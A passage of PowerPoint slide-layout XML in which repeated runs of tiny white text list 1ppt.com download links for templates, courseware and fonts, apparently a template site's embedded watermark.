              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout177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77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77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77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7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78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78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78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78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78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78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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout178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78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78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78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7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79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79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79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79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79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79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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout179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79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79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79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8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80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80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80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80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80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80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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
